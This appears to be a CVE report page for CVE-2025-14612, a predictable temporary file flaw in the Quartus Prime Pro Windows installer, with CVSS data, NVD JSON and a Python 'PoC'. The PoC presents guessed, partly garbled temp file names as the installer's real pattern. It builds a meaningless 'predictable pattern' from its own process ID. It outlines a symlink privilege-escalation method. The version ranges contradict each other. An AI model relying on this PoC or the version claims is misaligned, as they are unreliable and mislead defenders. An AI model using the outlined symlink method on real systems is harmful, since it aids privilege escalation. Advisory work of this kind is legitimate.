Security Vulnerability Report
中文
CVE-2025-14612 CVSS 6.7 MEDIUM

CVE-2025-14612

Published: 2026-01-07 02:03:00
Last Modified: 2026-01-12 15:16:22
Source: 04c0172e-9735-4a9d-a92a-fe01fa863447

Description

Insecure Temporary File vulnerability in Altera Quartus Prime Pro  Installer (SFX) on Windows allows : Use of Predictable File Names.This issue affects Quartus Prime Pro: from 24.1 through 25.1.1.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quartus_prime:*:*:*:*:pro:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Altera Quartus Prime Pro < 24.1
Altera Quartus Prime Pro 24.1
Altera Quartus Prime Pro 24.2
Altera Quartus Prime Pro 24.3
Altera Quartus Prime Pro 24.4
Altera Quartus Prime Pro 25.1
Altera Quartus Prime Pro 25.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14612 PoC - Insecure Temporary File in Quartus Prime Pro # This PoC demonstrates the predictable filename issue in Quartus installer import os import time import subprocess import sys def exploit_quartus_predictable_temp_file(): """ Demonstrate the predictable temporary file vulnerability in Quartus Prime Pro installer. This PoC shows how an attacker can predict temporary file names used during installation. """ # Predictable temp file pattern used by Quartus installer temp_dir = os.environ.get('TEMP', '/tmp') predictable_pattern = f"quartus_install_temp_{os.getpid()}" # Common temp file names used by SFX installers common_temp_files = [ f"{temp_dir}\\setup.exe", f"{temp_dir}\\install.ini", f"{temp_dir}\\quartus_temp", f"{temp_dir}\\q Quartus_temp_24", ] print(f"[*] Target: Quartus Prime Pro < 25.1.2") print(f"[*] Vulnerability: Predictable temporary file names (CWE-377)") print(f"[*] Temp directory: {temp_dir}") print(f"[*] Predictable pattern: {predictable_pattern}") # Simulate checking for predictable files for temp_file in common_temp_files: if os.path.exists(temp_file): print(f"[!] Found existing temp file: {temp_file}") print(f"[!] Attacker could pre-create symlink to overwrite sensitive files") # Create a junction/symlink to demonstrate the attack vector target_path = f"{temp_dir}\\malicious_quotus_file.dll" if not os.path.exists(target_path): print(f"[*] Creating demonstration file: {target_path}") with open(target_path, 'w') as f: f.write("This demonstrates the predictable filename vulnerability") print("\n[*] Attack methodology:") print("1. Identify predictable temp file names in installer") print("2. Pre-create files or symlinks at expected locations") print("3. Wait for installer to execute with elevated privileges") print("4. Achieve arbitrary file write or privilege escalation") return True if __name__ == "__main__": exploit_quartus_predictable_temp_file()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14612", "sourceIdentifier": "04c0172e-9735-4a9d-a92a-fe01fa863447", "published": "2026-01-07T02:03:00.270", "lastModified": "2026-01-12T15:16:22.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Temporary File vulnerability in Altera Quartus Prime Pro \n\nInstaller (SFX)\n\n on Windows allows : Use of Predictable File Names.This issue affects Quartus Prime Pro: from 24.1 through 25.1.1."}, {"lang": "es", "value": "Vulnerabilidad de archivo temporal inseguro en el instalador (SFX) de Altera Quartus Prime Pro en Windows permite: el uso de nombres de archivo predecibles. Este problema afecta a Quartus Prime Pro: desde la versión 24.1 hasta la 25.1.1."}], "metrics": {"cvssMetricV40": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-377"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quartus_prime:*:*:*:*:pro:*:*:*", "versionStartIncluding": "24.1", "versionEndExcluding": "25.3", "matchCriteriaId": "C2DBAFFE-8B54-4EDE-963D-55F7456DB4B6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.altera.com/security/security-advisory/asa-0004", "source": "04c0172e-9735-4a9d-a92a-fe01fa863447", "tags": ["Vendor Advisory"]}]}}